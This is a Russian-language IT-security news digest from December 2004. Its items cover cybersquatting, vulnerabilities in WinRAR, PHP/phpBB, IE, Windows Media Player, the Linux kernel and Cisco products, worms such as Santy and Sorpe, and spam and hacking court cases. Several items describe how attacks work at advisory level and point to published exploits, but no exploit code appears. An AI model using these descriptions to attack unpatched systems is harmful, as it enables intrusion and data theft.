После покупки компанией "Байкалфинансгруп" основного нефтедобывающего актива ЮКОСа был зарегистрирован домен baikalfinance.ru. Права на доменное имя будут принадлежать новому владельцу (выходцу из России, ныне проживающему в США) до декабря 2005 года. На днях состоялся аукцион, на котором за долги родительской компании продавалось дочернее предприятие НК "ЮКОС" — ОАО "Юганскнефтегаз". Покупателем основного нефтедобывающего актива ЮКОСа стало ООО "Байкалфинансгруп". Интригу в эту ситуацию внёс тот факт, что "Байкалфинансгруп" представляет собой никому не известную бизнес-структуру, сформированную незадолго до начала аукциона. Маловероятно, что г-ну Храброву удастся заработать на киберсквоттинге в этом конкретном случае — большинство специалистов считают, что "Байкалфинансгруп" является лишь промежуточным звеном в финансовой цепочке по уводу актива ЮКОСа. Очевидно, что киберсквоттер это понимает и сам, создание сайта baikalfinance.ru можно рассматривать как эпатаж. Помимо г-на Храброва зарегистрировать доменные имена, связанные с названием "Байкалфинансгруп" успели и другие киберсквоттеры. Так, доменное имя baikalfinancegroup.ru 21 декабря зарегистрировала некая Эстер, проживающая в России, а baikalfinansgroup.ru записан с сегодняшнего дня за москвичом Данилой Шабашовым.
nic.ru

24/12/2004 12:11 Уязвимость в архиваторе WinRAR
Secunia предупреждает о наличии опасной уязвимости в популярном архиваторе WinRAR. Дыра обеспечивает возможность получения несанкционированного доступа к удаленному компьютеру. Проблема связана с ошибкой при обработке имен файлов при их удалении из сформированного особым образом архива. Злоумышленник теоретически может спровоцировать ошибку переполнения буфера на машине-жертве и затем выполнить на ней произвольный вредоносный код. Брешь присутствует в архиваторе WinRAR версий 3.40/.41 и, возможно, некоторых других модификациях программы. Способов устранения уязвимости в настоящее время не существует.
Описание

24/12/2004 11:59 Opera подготовила новый, говорящий веб-браузер
В четверг компания Opera Software выпустила опытную версию капитального обновления своего веб-браузера. Новое, пока еще безымянное ПО обладает более мощной поддержкой технологии RSS (Really Simple Syndication), широко используемой для автоматического доступа к блогам и другим материалам, а также технологии, которая позволяет управлять браузером посредством голосовых команд и заставлять его прочитывать веб-сраницы вслух. Компания утверждает, что она внесла достаточно усовершенствований, чтобы финальная версия этого обновления стала не просто очередным апгрейдом, а полноценным новым релизом. «Новая версия Opera содержит существенные усовершенствования и некоторые очень полезные новые функции, так что быстрый, безопасный и широко настраиваемый браузинг должен привлечь много новых пользователей», — говорится в заявлении генерального директора Opera Джона фон Тежнера. За прошедший год на руку Opera играла растущая неудовлетворенность доминирующим веб-браузером Microsoft Internet Explorer, в котором то и дело находили уязвимости и который уже несколько лет радикально не обновлялся. Однако львиная доля преимуществ от массового экспериментирования с альтернативными браузерами досталась продукту open source Firefox, который с момента выпуска финальной версии в начале ноября загрузили свыше 12 млн раз.
Подробности

24/12/2004 11:26 ЕС оставил в силе приговор против Microsoft
В среду европейский суд нанес по корпорации Microsoft удар, предписав ей выпустить версию Windows без встроенного медиаплеера. Президент Европейского суда первой инстанции Бо Вестердорф сказал, что Microsoft должна понести наложенное Европейской комиссией в марте взыскание, несмотря на то, что поданная компанией апелляция все еще блуждает в системе. В марте Комиссия постановила, что софтверный гигант использовал свою монополию на рынке операционных систем с целью манипуляции рынком ПО медиаплееров и серверных ОС для рабочих групп. Компании было предписано выпустить версию Windows без встроенного медиаплеера и предоставить конкурентам больше технических деталей — и теперь это постановление должно вступить в силу. «Свидетельства, приведенные Microsoft, недостаточны для доказательства того, что исполнение наложенного Комиссией взыскания может причинить серьезный и непоправимый ущерб», — говорится в заявлении суда. Однако компания может опротестовать вынесенное в среду решение, обратившись в двухмесячный срок к президенту Европейского суда. Главный юрисконсульт Microsoft Брэд Смит сказал во время телеконференции в среду, что компания пока не решила, будет ли она подавать апелляцию. «Мы не знаем, будем ли мы апеллировать. Я не думаю, что это займет два месяца, но нам требуется время, чтобы решить, надо ли это делать», — сказал он.
Подробности

24/12/2004 10:24 AOL собирается запустить собственную публичную веб-почту
Компания AOL намеревается запустить собственную службу бесплатной электронной почты, передает издание NewsFactor. Как сообщили представители компании, на этой неделе началось бета-тестирование новой почтовой системы AOL Mail, основная задача которой - обеспечивать работу с электронной почтой через web-интерфейс. Как известно, сейчас ведущие игроки онлайнового бизнеса активно вводят новые бесплатные пользовательские сервисы, среди которых основными являются поисковые машины, программы для локального поиска, почтовые сервисы и блоги (в последнее время блоги расширяют функциональность в сторону большей мультимедийности). Многие участники рынка также разрабатывают собственные браузеры - известно, что в AOL ведутся работы сразу над двумя - возобновлены работы над Netscape и параллельно готовится к выходу новый продукт AOL Browser. Как полагают аналитики, новый почтовый сервис AOL призван составить конкуренцию службам Gmail от Google, Hotmail от Microsoft и Yahoo! Mail компании Yahoo!. После завершения работы над сервисом его планируется внедрить сначала для подключенных к провайдерским ресурсам AOL клиентов, и уже позже в течение наступающего года открыть для всех желающих.
Lenta.Ru

23/12/2004 17:19 Рада установила уголовную ответственность за "препятствование работе ЭВМ"
Верховная рада Украины установила уголовную ответственность за несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей и сетей электросвязи, передает агентство "Интерфакс". Согласно закону, уголовная ответственность будет наступать за "вмешательство", которое повлечет за собой "утечку, потерю, подделку, блокирование информации, искажение процесса обработки данных, нарушение порядка маршрутизации информации". Внесенный Радой дополнения также устанавливают ответственность "за создание с целью использования, распространения или сбыта «вредных» программ или технических средств, а также непосредственно распространение или сбыт". Кроме того, отныне Уголовным Кодексом предусматривается ответственность за несанкционированный сбыт или распространение "информации с ограниченным доступом", за "препятствование работе ЭВМ, автоматизированных систем, компьютерных сетей и сетей электросвязи путем массового распространения сообщений электросвязи". Кроме того, устанавливается ответственность за несанкционированные действия с компьютерной информацией, совершенные человеком, имеющим право доступа к ней. У виновных будут конфискованы программные или технические средства, с помощью которых были совершены противоправные действия. Закон разрешает проводить досудебное следствие по указанным статьям следственным органам Службы безопасности Украины (СБУ).
"Интерфакс"

23/12/2004 15:44 Путин высказался против ограничения распространения информации в сети интернет
Владимир Путин сказал: «Мне не хотелось бы, чтобы под предлогом борьбы с криминальными проявлениями мы ограничивали свободное распространение информации в интернете».
Подробнее:www.cnews.ru

21/12/2004 15:50 Эпидемия Net-Worm.Perl.Santy.a: веб-ресурсы вновь в опасности!
"Лаборатория Касперского" сообщает об обнаружении нового опасного интернет-червя Net-Worm.Perl.Santy.a. Вредоносная программа заражает веб-сайты, используя для размножения уязвимость в популярном приложении для создания интернет-ресурсов - phpBB. В настоящее время распространение программы достигло эпидемиологического порога, что позволяет говорить о полномасштабной эпидемии в глобальной сети. Однако данная эпидемия не затрагивает пользователей персональных компьютеров - червь не представляет опасности для посетителей зараженных ресурсов. Для своего распространения через Интернет червь использует достаточно необычный метод. Вредоносная программа формирует специальный запрос для поисковой системы Google, в результате чего находит сайты, работающие под управлением уязвимой версии phpBB. Затем червь отсылает на найденные сайты строку, содержащую процедуру активизации уязвимости. В результате обработки данной процедуры атакуемым сервером, червь проникает на сайт и получает управление над ресурсом, после чего процесс работы червя повторяется. Получив управление, Net-Worm.Perl.Santy.a последовательно проверяет все каталоги на зараженном сайте и замещает найденные файлы с расширениями .htm, .php, .asp, .shtm, .jsp, .phtm, следующим текстом:
"This site is defaced!!! This site is defaced!!! NeverEverNoSanity WebWorm generation". Однако, помимо замещения содержимого атакованного сайта, червь не содержит иной деструктивной функциональности, и не заражает персональные компьютеры при посещении пораженных им ресурсов интернета. Во избежание атаки Net-Worm.Perl.Santy.a антивирусные эксперты "Лаборатории
Касперского" рекомендуют всем пользователям системы phpBB произвести обновление продукта до версии 2.0.11.
"Лаборатория Касперского"

21/12/2004 14:55 MS Office превратят в "платформу"
В будущем году компания Microsoft намерена провести первую конференцию разработчиков программных продуктов, посвященную исключительно семейству офисных приложений Microsoft Office System. Сама "система", таким образом, приобретает статус единой платформы для создания специализированных приложений, "заточенных" под конкретные задачи. Конференция, как пишет CNET, пройдет со второго по четвертое февраля в Редмонде, где располагается штаб-квартира Microsoft. По предварительным расчетам организаторов, в конференции примут участие не менее восьмисот разработчиков, представляющих интересы независимых производителей программного обеспечения. Целью проведения конференции станет попытка убедить разработчиков в выгодности создания разнообразных надстроек и плагинов для таких продуктов из семьи MS Office, как Word или Excel. По мнению руководства Microsoft, рынок "штепселей" под офис стоит порядка ста миллиардов долларов.
Internet.Ru

21/12/2004 13:41 Американские штаты сдаются спамерам
Американская фирма, занимающаяся маркетингом через электронную почту, на которую подали в суд на основании антиспамерского закона штата Мэриленд, была оправдана. Судья отказал в рассмотрении дела на том основании, что закон не соответствует Конституции США. Таким образом, законодатели проигрывают спамерам 2:4. В штатах Нью-Йорк, Вирджиния и Вермонт попытки регулирования потоков электронной корреспонденции были названы неконституционными. Устояли лишь антиспамерские законы штатов Вашингтон и Калифорния. Противники антиспамерских законов утверждают, что нововведения нарушают статью 1 Конституции США, известную как «Пункт о коммерции» (Commerce Clause). Статья защищает возможность коммерческих отношений между штатами страны, запрещая местным законам принимать самостоятельные решения относительно таких случаев. Законы о борьбе с рассылкой коммерческой корреспонденции, охватывающей несколько штатов, таким образом, неконституционны, сообщил Computer Weekly.
CNews

21/12/2004 13:21 Эксплоит уязвимости в phpbb2
Опубликован эксплоит уязвимости в опулярном скрипте для организации форумов phpBB, уязвимость которого связана с уязвимостью самого языка PHP. В эксплоите используется уязвимость в коде ext/standart/var_unserializer.c. Как пишет сам автор, использование эксплоита позволяет получить дамп памяти кучи в phpBB с использованием функции unserialize() для хранения cookie. В результате анализа полученных данных можно получить SQL-пароли пользователей. Для успешного запуска эксплоита требуются дополнительный файл заголовков serv.h и исходник serv.cpp. На самом сайте также есть выполнимый файл. Просьба не обращать внимания на фон на приведённой ниже ссылке. Забавляются ребята.
Эксплоит

21/12/2004 12:17 Уязвимость Windows Media Player
Исследователь компьютерной безопасности из Ирана Arman Nayyeri сообщил об обнаружении двух уязвимостей в популярном в мире Windows-систем медиа-плеере Windows Media Player. Обе уязвимости связаны с компонентами управления ActiveX. Первая ошибка в функции "getItemInfoByAtom()" позволяет определить наличие (или отсутствие) файла в системе, а также его размер. Подобная "особенность может быть использована создателями зловредного Вэб-сайта при просмотре его содержимого при помощи IE, который, как известно, очень тесно интегрирован с WMP. Вторая уязвимость связана с ошибками в функциях "setItemInfo()" и "getItemInfo()", которые позволяют удалённому атакующему (посещаемому Вэб-серверу, например) получать и изменять информацию локального MP3-файла (имя артиста, название песни, альбом). На первый взгляд это не кажется таким уж опасным, однако, как пишет автор, позволяет потенциально запустить произвольный скрипт в зоне безопасности my computer zone. Выпущены примеры эксплоитов уязвимостей. Обнаружены в Windows Media Player 9 ОС Microsoft Windows 2000 SP4 / XP SP1 / XP SP2. Устранены M$ в недавно вышедшей версии WMP 10.
Примеры эксплоитов

21/12/2004 11:52 Google заделала дыру в программе локального поиска
Согласно распространенному в понедельник заявлению компании, она выпустила поправку для устранения уязвимости, обнаруженной американским ученым и двумя его студентами в конце ноября. «Мы в курсе этой уязвимости в программе Google Desktop Search и уже решили эту проблему, так что все существующие и будущие пользователи в безопасности», — сказала представительница Google. Дэн Уоллах, доцент вычислительной техники Университета Райса, обнаружил ошибку вместе с аспирантами Сетом Фогарти и Сетом Нильсоном. Уоллах характеризует ее как комбинационную уязвимость — пробел в защите, вызванный взаимодействием нескольких разных компонентов. Как пишет газета The New York Times, которая первой сообщила об обнаружении этой ошибки, каждый раз, когда производится поиск, инструмент Google выявляет трафик, адресуемый на Google.com, и вставляет в него результаты с жесткого диска пользователя. Уоллаху, Фогарти и Нильсону удалось обмануть программу Google, заставив ее помещать результаты на другие веб-страницы, где их может прочесть злоумышленник. Для этого необходимо, чтобы пользователь предварительно побывал на веб-сайте атакующего, снабженном специальной Java-программой (группа Уоллаха написала такой код), которая перенастраивает инструмент локального поиска Google на передачу информации, найденной пользователем. Эта программа могла делать с результатами поиска все, включая их доставку на веб-сайт злоумышленника. Информация об этой ошибке обнародована всего через несколько дней после того, как аналитическая фирма Gartner предупредила организации, что им следует избегать установки инструмента локального поиска Google до тех пор, пока не выйдет версия, более подходящая для корпоративных пользователей.
ZDNet

21/12/2004 11:29 Подробное описание уязвимостей в PHP
Как мы сообщали ранее, PHP Group в экстренном порядке были выпущены обновлённые версии популярного скриптового языка PHP - 4.3.10 и 5.0.3, что было связано с обнаружением целой пачки уязвимостей в PHP. Об уязвимости сообщил довольно известный исследователь компьютерной безопасности Stefan Esser из группы, представляющей проект Hardened-PHP. В бюллетене проекта сообщается о семи уязвимостях в различных функциях PHP: pack(); unpack(); обход ограничений safe_mode_exec_dir, накладываемых при включённом режиме safe_mode; realpath(); unserialize(). В качестве примеров уязвимых скриптов приводятся: phpBB2, Invision Board, vBulletin, Woltlab Burning Board 2.x, Serendipity Weblog, phpAds(New). Группа разработала также собственную версию PHP с усиленной защитой и выпустила полностью исправленную версию системы с дополнительными мерами безопасности.
Бюллетень

21/12/2004 10:52 В будущем году появится новое средство защиты CD от копирования
Конгломерат Sony BMG Music Entertainment заключил соглашение с британской компанией First 4 Internet, разработавшей новую систему защиты компакт-дисков от копирования. В будущем году Sony BMG планирует начать серийный выпуск аудиозаписей, защищённых новой системой. Несколько крупных лейблов уже выпустили защищённые этой системой диски, правда, это был не серийный выпуск, а предварительные релизы (среди них - последние альбомы Eminem и U2), предназначенные для журналистов и критиков. Серийный выпуск защищённых этой технологией дисков намечен, как уже сказано, на 2005 год; это будет первое подобное мероприятие для Sony в США, хотя в других регионах попытки начать серийный выпуск защищённых CD Sony уже предпринимала. BMG ведёт себя агрессивнее: уже в этом году состоялись несколько "защищённых" релизов. Компания First 4 Internet неторопливо работает над собственной системой защиты от копирования с 2001 года; их технология позволяет шифровать аудиоданные на дисках, оставляя при этом возможность проигрывать их на обычных CD-плеерах. На диске также содержатся некоторые данные, дополнительно усиливающие эту защиту. Как пишет ZDNet, аналитики по-прежнему скептично относятся к подобным затеям и сомневаются, что системы защиты от копирования получат в США широкое распространение. Впрочем, в прошлом году один из дисков, на котором было чётко обозначено наличие защиты, поднялся в американских чартах до самых верхних позиций.

21/12/2004 10:36 Хакера посадили в тюрьму на полгода за взлом сети НАСА
21-летний житель Портлэнда, штат Орегон, Грегори Аарон Хернс (Gregory Aaron Herns) проведет шесть месяцев в федеральной тюрьме США за взлом компьютерной сети НАСА в 2001 году, сообщает Associated Press. На ликвидацию последствий взлома НАСА потратило более 200 тысяч долларов. В тот момент, когда Хернс взламывал сеть Центра космических полетов Годдарда, ему было всего 17 лет. По словам Хернса, он взломал сеть НАСА для того, чтобы найти свободное дисковое пространство для скачанных им фильмов. Ликвидация результатов поступка жителя Портлэнда заняла у специалистов НАСА несколько часов. Осужденный, который сейчас проходит обучение в колледже по одной из компьютерных специальностей, принес свои извинения НАСА и полиции. «Я сделал это много лет назад. С той поры я изменился», — сказал Хернс. Помощник обвинителя, занимавшегося делом Хернса, убежден, что поступок осужденного — нечто большее, чем просто подростковая шалость с компьютером. «Когда вы выключаете систему, ее нужно включать снова. Это не так просто, как перезагрузить «Макинтош». Хернсу предстоит компенсировать ущерб, который он нанес НАСА. Кроме того, в течение трех лет осужденный будет иметь ограниченный доступ к компьютерам.
Viruslist

20/12/2004 15:33 В США суд приговорил спамеров к выплате 1 миллиарда долларов
Свыше одного миллиарда долларов по иску интернет-провайдера из штата Айова должны выплатить три компании, занимавшиеся рассылкой спама. Решение об этом принял Федеральный суд США, установив, таким образом, рекордную сумму штрафа за спам, сообщает Associated Press. Компания Роберта Крамера (Robert Kramer) предоставляет услуги электронной почты более чем 5 тысячам клиентов в восточной части Айовы. В 2000 году все абоненты компании стали жертвой спамерской атаки со стороны AMP Dollar Savings Inc. из Аризоны, Cash Link Systems Inc. и TEI Marketing Group, базирующихся во Флориде. В день клиенты Крамера, согласно представленным суду доказательствам, получали до 10 миллионов писем, содержавших рекламные объявления и коммерческие предложения спамеров. По решению суда AMP Dollar Savings Inc. должна выплатить истцу 620 миллионов долларов, Cash Link Systems Inc. - 360 миллионов и TEI Marketing Group - 140 миллионов. "Это решение, несомненно, является очень важным для всех нас", - заметил после оглашения приговора Роберт Крамер. Он заметил, что не надеется, что ответчики полностью выплатят штраф, но на часть суммы все же рассчитывает.
Lenta.Ru

17/12/2004 16:44 Американский хакер получил самый большой в истории США срок
21-летний американец Брайан Сальцедо (Brian Salcedo) приговорен судом штата Северная Каролина к 9 годам тюремного заключения за взлом сети магазина компьютерной техники и нарушение ее работы. Вместе с сообщником хакер разъезжал по городу в поисках незащищенных Wi-Fi-сетей. Во время одного из таких «боевых выездов» или wardriving, как их называют в хакерской среде, он атаковал беспроводную сеть магазина Lowe. Сельцедо удалось модифицировать программу обработки информации с кредитных карт в центральном компьютере и на рабочих местах. С помощью троянского кода он предполагал перехватывать платежные реквизиты покупателей. Будь он программистом получше, возможно, у него что-то получилось бы, однако после запуска модифицированных его программой кассовых компьютеров, те отказались работать. Владелец магазина позвонил в ФБР и хакера вскоре арестовали. Брайан Сальцедо стал первым хакером в США, получившим столь длительный срок заключения, обогнав легендарного Кевина Митника, отсидевшего пять с половиной лет. Для сравнения — в Китае за хакерство уже расстреляли несколько человек.
CNews

17/12/2004 16:22 Microsoft незаметно выпустила "критическое" обновление для Windows ХР SP2
Корпорация Microsoft незаметно выпустила "критическое" обновление для операционной системы Windows ХР со вторым сервис-паком, сообщает "Компьюлента". Как сообщается на сайте софтверного гиганта, проблема связана с некорректной настройкой по умолчанию входящего в состав второго пакета обновлений брандмауэра. В ряде случаев межсетевой экран может открывать доступ к пользовательскому компьютеру для всего интернета. Ошибка проявляется тогда, когда активирована опция "My network (subnet) only". При выборе данного режима работы операционная система автоматически открывает доступ к файлам и принтерам для других пользователей локальной сети. Причем, если владелец компьютера подключается к интернету посредством dialup-соединения с помощью программного обеспечения, вносящего модификации в таблицу маршрутизации, брандмауэр Windows может интерпретировать интернет как локальную подсеть. Кстати говоря, информация об этом недостатке публиковалась вскоре после выхода второго сервис-пака, но исправить ее в Microsoft решили только сейчас. Примечательно, что информация о "критическом" обновлении для Windows ХР SP2 не вошла в декабрьские бюллетени безопасности, выпущенные во вторник. Дело в том, что в бюллетенях описываются только программные дыры, тогда как проблема с брандмауэром связана с неправильной конфигурацией.
Подробности

17/12/2004 15:42 Способ защиты от уязвимости в ядре Linux
Ранее мы сообщали о наличии уязвимости в реализации протокола групповой адресации IGMP в ядре Linux. Разумеется, производители основных дистрибутивов непременно залатают дыру, но в качестве временной меры в BUGTRAQ некто even multiplexed внести поправки в параметры сетевого стека следующего вида:
net.ipv4.igmp_max_msf = 0
net.ipv4.igmp_max_memberships = 0
net.ipv4.icmp_ignore_bogus_error_responses = 1.
Кроме того, хотелось бы заметить, что наличие уязвимости (потенциальной) можно определить по наличию файлов /proc/net/igmp, /proc/net/mcfilter.
BugtraQ

17/12/2004 15:27 Уязвимость в Winamp
В распространенном программном медиаплеере Winamp обнаружена опасная уязвимость. Эксплуатируя дыру, злоумышленник теоретически может спровоцировать аварийное завершение работы приложения. Для реализации нападения достаточно вынудить пользователя открыть составленный определенным образом файл в формате MP4 или М4А, содержащий в тегах вредоносный код. Кроме того, DoS-атака может быть осуществлена через файл с расширением NSV или NSA, содержащий большой объем произвольных данных (около одного мегабайта). Способов устранения уязвимости на сегодняшний день не существует.
Описание уязвимости

17/12/2004 15:13 Студенты обнаружили десятки ошибок в Unix-ПО
Студенты специалиста по вычислительной технике, иконоборца Даниеля Бернштейна обнаружили 44 уязвимости в различных Unix-приложениях. Ошибки — от мелких просчетов в сравнительно редко используемых программах до более серьезных пробелов в защите ПО, поставляемого с большинством версий операционной системы Linux, — были выявлены в рамках выпускного курса Бернштейна в Университете штата Иллинойс в Чикаго. Список этих ошибок появился в среду на веб-сайте студента Джеймса Лонгстрита. Бернштейн, профессор вычислительной техники университета, пока не ответил на просьбу прокомментировать находки. За два дня до этого компания, специализирующаяся на тестировании ПО, объявила, что в течение четырех лет, пользуясь собственным аналитическим инструментом, она обнаружила 985 ошибок в последней версии ядра Linux. Это число кажется большим, но оно меньше, чем в большинстве коммерческих программ, утверждает компания. Как следует из учебных заданий, размещенных на веб-сайте Бернштейна, каждый учащийся в течение осеннего семестра должен был найти 10 ошибок, за что ему причитается 60% зачета. Судя по тому, что на 25 студентов приходится всего 44 обнаруженных ошибки, теперь им остается надеяться лишь на удачу. Ниже также приводится ссылка на программу курсов, читаемых профессором Бернштейна "MCS 494, UNIX Security Holes". Желающие могут с ней ознакомиться.
Список ошибок
Программа курсов

17/12/2004 15:07 Microsoft будет встраивать антишпионские средства в Windows
Корпорация Microsoft объявила о покупке софтверной компании Giant Software, базирующейся в Нью-Йорке и специализирующейся на производстве программного обеспечения, предназначенного для поиска и нейтрализации так называемых "шпионских программ" (spyware), сообщает Associated Press. Microsoft намеревается встраивать защиту от таких программ в свои массовые операционные системы семейства Windows. Предполагается, что новые продукты, разработанные Giant, штат которой сейчас насчитывает 10 человек, станут компонентами ОС, причем их можно будет загрузить в виде обновлений для уже работающих ОС Windows XP и Windows 2000 и они войдут в состав пакетов расширений (service packs). Вместе с тем, представители Microsoft заявляют, что, возможно, продукты или обновления, которые создадут специалисты Giant для их компании, будут платными. Окончательно решение по этому вопросу еще не принято.
Lenta.Ru

17/12/2004 14:49 Уязвимости в Cisco Guard и Cisco Unity
Cisco сообщила о двух схожих уязвимостях, присутствующих в ее продуктах. Первая уязвимость присутствует в Cisco Guard 3.1 и более ранних и позволяет получить привилегия администратора. Проблема заключается в том, что Cisco Guard в процессе инсталляции устанавливает дефолтный пароль для аккаунта "root", вместо нового пароля, введенного пользователем. Схожая проблема и в Cisco Unity. При интеграции с Exchange, Cisco Unity создает несколько аккаунтов с дефолтными паролями. Уязвимость присутствует в версиях 2.x, 3.x, и 4.x (предшествующих версии "4.0(5)") при интеграции с Exchange. В системах, интегрированных с Lotus Notes уязвимость не присутствует. Как и в предыдущем случае, успешное использование уязвимости может привести к получению административных привилегий. Рекомендуется сменить пароли аккаунта "root" (в случае с Cisco Guard) и специальных аккаунтов EAdmin, Unity_, UAMIS_, UOMNI_, UVPIM_ и Esubscriber (в случае с Cisco Unity).
Original Advisories: Cisco Guard, Cisco Unity

17/12/2004 14:04 Еще одна уязвимость в Internet Explorer
Как сообщает секьюрити компания Secunia, некто Paul сообщил об обнаруженной уязвимости в Internet Explorer 6.0, которая может быть использована для проведения cross-site scripting атаки. Уязвимость связана с ошибкой в DHTML Edit ActiveX контроле при выполнении функции "execScript()" в некторых ситуациях. Это может быть использовано для выполненния произвольного скрипта в броузере пользователя в контексте другого сайта. Уязвимость подтверждена на полностью пропатченной системе Microsoft Windows XP SP1/SP2 и Internet Explorer 6.0. Рекомендуется поставить "высокий" (high) уровень безопасности для зоны "Internet" в настройках Internet Explorer (или отключить инициализацию и запуск ActiveX). Secunia разместила страничку, на которой можно проверить присутствует ли данная уязвимость в вашей версии броузера.
Источник

17/12/2004 12:49 "Единая Россия" намерена искоренить спам
В четверг группа депутатов от "Единой России" внесла на рассмотрение Госдумы новую редакцию закона о рекламе. Среди прочего, законопроект вводит запрет на рассылку спама, пишет газета "Ведомости". Распространение рекламы по сетям электросвязи, "в том числе с использованием телефонной, факсимильной, мобильной связи и компьютерных сетей", по новому законопроекту разрешается лишь с согласия адресата. В противном случае компания, разославшая спам, может быть оштрафована на 40 - 50 тысяч рублей, а физическое лицо - на 2500 - 3000 рублей. Аналогичный законопроект готовит и Федеральная антимонопольная служба, но правительство пока одобрило лишь концепцию документа, уточняет газета. Как отмечает замгендиректора компании Rambler Иван Засурский, нынешняя редакция закона - это первая попытка создать законодательную базу для противодействия спамерам, и она вполне может оказаться действенной. Что ж, будем надеяться.
Источник

17/12/2004 12:25 Вышел релиз Samba 3.0.10
Вышла новая стабильная версия Samba — 3.0.10. Это так называемый "секьюрити релиз" (Security Release), в котором в первую очередь устранена недавно найденная уязвимость с целочисленным переполнением, позволяющая удаленно исполнять произвольный код в системе (CAN-2004-1154), а также исправлены все текущие баги.
Побробнее о релизе

17/12/2004 12:16 "МТУ-Интел" расширяет зону предоставления услуг
Как сообщает CNews, компания «МТУ-Интел» ведёт активные переговоры с региональными телекоммуникационными операторами с целью выхода за пределы московского региона. Интерес для компании представляют бизнес-структуры в Центральном федеральном округе. Аналитики считают, что экспансия «МТУ-Интел» в регионы является закономерной реализацией стратегии холдинга «Система-Телеком», в который входит оператор. Кстати, 16 декабря «МТУ-Интел» объявило о заключении 100-тысячного контракта на услугу «Домашний интернет-канал СТРИМ». «Юбилейным» абонентом стала Ирина Александровна Соловьева, студентка Московского государственного технологического университета «Станкин». Так что возможность компании выступать в качестве консультанта имеет под собой реальную основу. В последние 4 месяца компания наблюдала взрывной рост абонентской базы, в связи с чем она столкнулась с рядом трудностей, отразившихся на качестве обслуживания абонентов. По заверениям представителей оператора, на данный момент все проблемы устранены. Как рассказал коммерческий директор «МТУ-Интел» Николай Захаров, цель достигнуть к концу текущего года показателя в 100 тыс. абонентов ADSL-доступа была поставлена советом директоров компании в конце июня 2004 года. До этого компания планировала подключить к концу года 40 тыс. абонентов, а первоначальные планы на 2004 год предусматривали отметку в 24 тыс.
Источники: CNews, МТУ-Интел

17/12/2004 12:14 В .ru зарегистрировали 300 тыс. доменных имен
В конце 2003 г. число доменов второго уровня в зоне .ru составило 214 тыс. - на 37% больше, чем в декабре 2002 г. Примерно с такой же скоростью росло количество российских пользователей интернета. По данным ФОМ, месячная аудитория российского интернета летом 2004 года составила 13,4 млн. чел. Ожидается, что при сохранении нынешней экономической ситуации в ближайшие три года российский сегмент Сети удвоится по объему аудитории. Рост интереса к интернету в России просматривается и с позиции регистрации доменов в национальном домене .ru. По прогнозу RU-Center, прирост доменов второго уровня в домене .ru по итогам 2004 года составит более 40%. В настоящий момент ведущим регистратором доменных имен в зоне .ru остается компания RU-Center, на долю которой приходится свыше 62% всех регистраций. Чуть более 17% доменов обслуживаются РосНИИРОС, однако эта цифра постоянно снижается, поскольку РосНИИРОС полностью прекратит предоставление услуг по регистрации доменных имен с 1 января 2005 года. На долю остальных пяти аккредитованных регистраторов приходится около 20%.
Источник CNews, по материалам Iнфоцентр

16/12/2004 16:41 Уязвимости в Linux Kernel
Paul Starzetz сообщил об обнаруженных уязвимостях в ядре Linux, которые могут быть использованы для проведения DoS (Denial of Service) атаки на уязвимую систему удаленно, или локально для повышения привилегий, получения конфиденциальной информации или организации DoS.
Одна уязвимость связана с ошибкой в функции "ip_mc_source()" в реализации IGMP (Internet Group Management Protocol). Благодаря этой ошибке локальный пользователь может переписать память ядра (kernel memory), что может привести к краху системы или может позволить повысить привилегия пользователя. Эта же уязвимость может быть использована через API функции "ip_mc_msfget()" и "ip_mc_gsfget()" что может позволить получить содержимое большого участка памяти ядра.
Другая уязвимость присутствует из-за неправильной проверки параметров IGMP сообщений в функции "igmp_marksources()" сетевого модуля IGMP. В результате может возникнуть ошибка доступа к памяти по неверному адресу при обработке специально созданного IGMP_HOST_MEMBERSHIP_QUERY сообщения, что приведет к краху системы. Успешное использование этой уязвимости требует, чтобы ядро было скомпилировано с поддержкой мультикастинга и обработки входящих IGMP пакетов.
В функции разбора scm сообщений "__scm_send()" при обработке специально созданного дополнительного (auxiliary) сообщения, посланного в сокет, может возникнуть кросс-блокировка (deadlock), что может быть использовано локальными пользователями для остановки сервиса.
Все уязвимости подтверждены в версиях 2.4-2.4.28 и 2.6-2.6.9.
Источник
Описание уязвимости в IGMP
Описание уязвимости в __scm_send()

16/12/2004 14:37 Червь Sorpe маскируется под обновление Microsoft
Компания Symantec предупреждает о появлении нового червя Sorpe. После проникновения на машину-жертву этот вирус создает на жестком диске несколько своих копий, вносит ряд изменений в реестр Windows и затем осуществляет сканирование доступных накопителей в поисках адресов электронной почты. Собранная информация впоследствии используется в процессе составления списка рассылки вредоносного кода, причем в качестве обратного адреса в отправляемых письмах всегда проставляется строка "support@microsoft.com". Кроме того, червь Sorpe от имени основателя корпорации Microsoft Билла Гейтса рассылает сообщения по адресам электронной почты, принадлежащим антивирусным компаниям.
Источник

16/12/2004 14:36 Внеплановые релизы PHP 4.3.10 и 5.0.3
15 декабря выпущены новые релизы PHP 4.3.10 и 5.0.3. Выход этих внеплановых релизов обусловлен обнаружением нескольких серьезных уязвимостей. Среди них - проблемы безопасности, связанные с ошибками в функциях pack и unpack, позволяющих злоумышленникам удаленно запустить произвольный код на web-сервере, и в функции safe_mode, позволяющих обойти ограничения safe_mode_exec_dir. Кроме этого исправлены другие, менее критичные баги. Пользователям настоятельно рекомендуется обновить PHP до свежевышедших версий как можно скорее.
Источник
Список изменений PHP 5.0.3
Список изменений PHP 4.3.10

16/12/2004 14:35 Atak, еще один вирус поздравил пользователей с рождеством
PandaLabs зафиксировала появление версий H, I и J червя Atak, которые распространяются в сообщениях с рождественскими поздравлениями. В этом они похожи на недавно появившегося червя Zafi.D, использующего для распространения такую же технику социальной инженерии. Три версии Atak имеют много общего, отличаясь только размером прикрепленных к зараженному сообщению файлов. Однако из-за программной ошибки Atak.J не способен самостоятельно рассылаться дальше. Новые версии червя Atak проникают на компьютеры в электронных письмах с темой Merry X-Mas! или Happy New Year! и текстом сообщения Happy New year and wish you good luck on next year! или Mery Chrismas & Happy New Year! 2005 will be the beginning! Вложение к письму всегда сжато в формате zip и содержит файл, имя которого может быть bat, com, pif или scr. Если пользователь запускает этот файл, черви создают собственные копии в системной директории Windows под именем dec25.exe. В то же время они используют свой SMTP механизм для дальнейшей рассылки своих копий на все адреса, которые они находят в файлах с определенными расширениями, сохраненных на зараженном компьютере.
Источник

16/12/2004 14:35 Вышел Kaspersky Anti-Hacker 1.7
